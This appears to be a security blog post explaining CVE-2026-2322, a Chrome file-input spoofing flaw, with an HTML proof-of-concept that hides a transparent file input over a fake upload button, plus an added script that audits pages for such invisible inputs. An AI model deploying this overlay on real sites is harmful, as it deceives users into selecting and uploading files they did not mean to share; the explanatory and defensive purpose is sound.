Summary:
A vulnerability tracked as CVE-2026-2322 was found in Google Chrome’s file input feature. Before version 145.0.7632.45, a remote attacker could use a crafted HTML page to trick users into interacting with a fake UI, making them think they’re uploading files safely when they’re actually being deceived. In this post, I’ll walk you through what happened, how it works, and show a basic proof-of-concept. All content here is unique and simply explained for anyone curious about browser security.

Severity: Low (but can still be dangerous)

- How it works: If a user is convinced to follow some special clicks or drags, a crafted web page could spoof what the real file upload interface looks like, tricking the user.

References

- Chromium Bug Tracker (example bug discussion)
- Chrome Releases Blog (official release notes)

How Did the Exploit Work?

The vulnerability is related to the way Chrome renders file input elements. A malicious website could create an *overlay* or *fake* file input that looks just like the real thing. When a user clicks in the right place, the website can make it look like something official is happening, tricking the user into doing something risky or sharing files they didn’t intend to share.

Simple Proof-of-Concept (PoC) Code

Here’s a basic example showing how a site might attempt this. Notice how the file input is styled to be invisible, while a fake button is shown instead:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CVE-2026-2322 Demo</title>
  <style>
    #realFileInput {
      position: absolute;
      left: 0; top: 0;
      width: 100%; height: 100%;
      opacity: 0; /* Hide real file input */
      z-index: 10;
    }
    #fakeButton {
      position: absolute;
      left: 0; top: 0;
      width: 200px; height: 40px;
      background: #4285f4; color: white;
      display: flex; align-items: center; justify-content: center;
      font-size: 18px; border-radius: 4px;
      z-index: 9;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <div id="fakeButton">Choose File to Upload</div>
  <input type="file" id="realFileInput" />
  <script>
    // Forward clicks on the fake button to the real input
    // (the CSS above already stacks the transparent input over the button)
    document.getElementById('fakeButton').addEventListener('click', function() {
      document.getElementById('realFileInput').click();
    });
    document.getElementById('realFileInput').addEventListener('change', function() {
      alert('File selected: ' + this.files[0].name);
    });
  </script>
</body>
</html>

- The fake button appears where the user expects a real file upload button.
- When a user interacts, they think they’re using a safe Chrome UI, but they’re actually engaging with a spoofed element.
- Browser UI (like file pickers) often looks the same everywhere, so users can’t easily tell whether it’s real.
- This can lead to phishing attacks.

In the context of CVE-2026-2322, the attacker *can’t* access the actual file right away (browser sandboxing applies), but could manipulate users in tricky scenarios.

How Was It Fixed?

Google closed this bug in Chrome 145.0.7632.45 by strengthening how file inputs are rendered and ensuring they can’t be overlaid or spoofed easily.

You can see patch notes and discussions here:
- Chromium file input fix diff (example)

Final Thoughts

CVE-2026-2322 shows how even UI quirks on modern browsers can open the door for social engineering and small-scale phishing. While technically “low severity,” these bugs are important to fix before someone combines them with bigger attacks.

Get more details:
- Chromium issue tracker for CVE-2026-2322
- Checklist: Is my Chrome up to date?

If you’re a developer:
Don’t overlay or fake form elements—browsers and users expect the real thing, and tricks might put you at risk!
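
To check your own pages for the pattern shown in the PoC, here is an added audit helper (not from the original post and not Chromium code). It flags file inputs that are effectively invisible yet cover a large area or sit on top of other content. The function names, the two thresholds and the sample descriptors are assumptions made for this example.

```javascript
// Added audit helper, not Chromium code. Both thresholds are assumptions to tune.
const MAX_OPACITY = 0.1;     // at or below this the input is effectively invisible
const MAX_AREA_RATIO = 0.25; // viewport share an invisible input may cover

// Pure check on a plain descriptor, so it can be tested without a DOM.
function auditFileInput(info, viewport) {
  const reasons = [];
  if (info.type !== 'file' || info.opacity > MAX_OPACITY) return reasons;
  const area = Math.max(0, info.rect.width) * Math.max(0, info.rect.height);
  const ratio = area / (viewport.width * viewport.height);
  if (ratio > MAX_AREA_RATIO) {
    reasons.push(`invisible file input covers ${Math.round(ratio * 100)}% of the viewport`);
  }
  if (info.pointerEvents !== 'none' && info.coversOtherContent) {
    reasons.push('invisible file input receives clicks aimed at content beneath it');
  }
  return reasons;
}

// Browser-only: describe every file input in the live DOM and audit it.
// Opacity set on ancestor elements is not considered here.
function auditDocument(doc, win) {
  const viewport = { width: win.innerWidth, height: win.innerHeight };
  return Array.from(doc.querySelectorAll('input[type="file"]')).map((el) => {
    const style = win.getComputedStyle(el);
    const rect = el.getBoundingClientRect();
    // Elements stacked at the input's centre, topmost first.
    const stack = doc.elementsFromPoint(rect.left + rect.width / 2, rect.top + rect.height / 2);
    const below = stack[stack.indexOf(el) + 1];
    const info = {
      type: el.type,
      opacity: parseFloat(style.opacity),
      pointerEvents: style.pointerEvents,
      rect: { width: rect.width, height: rect.height },
      coversOtherContent: stack[0] === el && !!below && below !== doc.body && below !== doc.documentElement,
    };
    return { id: el.id, reasons: auditFileInput(info, viewport) };
  }).filter((r) => r.reasons.length > 0);
}

// Constructed descriptors: the PoC's #realFileInput and an ordinary visible input.
const VIEWPORT = { width: 1280, height: 720 };
const POC_INPUT = { type: 'file', opacity: 0, pointerEvents: 'auto',
  rect: { width: 1280, height: 720 }, coversOtherContent: true };
const PLAIN_INPUT = { type: 'file', opacity: 1, pointerEvents: 'auto',
  rect: { width: 250, height: 30 }, coversOtherContent: false };
console.log(auditFileInput(POC_INPUT, VIEWPORT), auditFileInput(PLAIN_INPUT, VIEWPORT));
```

In a browser, run `auditDocument(document, window)` from the DevTools console or an end-to-end test. A small, visually hidden input paired with a real `<label>` is not flagged, because it neither covers a large area nor sits over other content.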

Timeline

Published on: 02/11/2026 18:08:05 UTC
Last modified on: 02/13/2026 14:51:37 UTC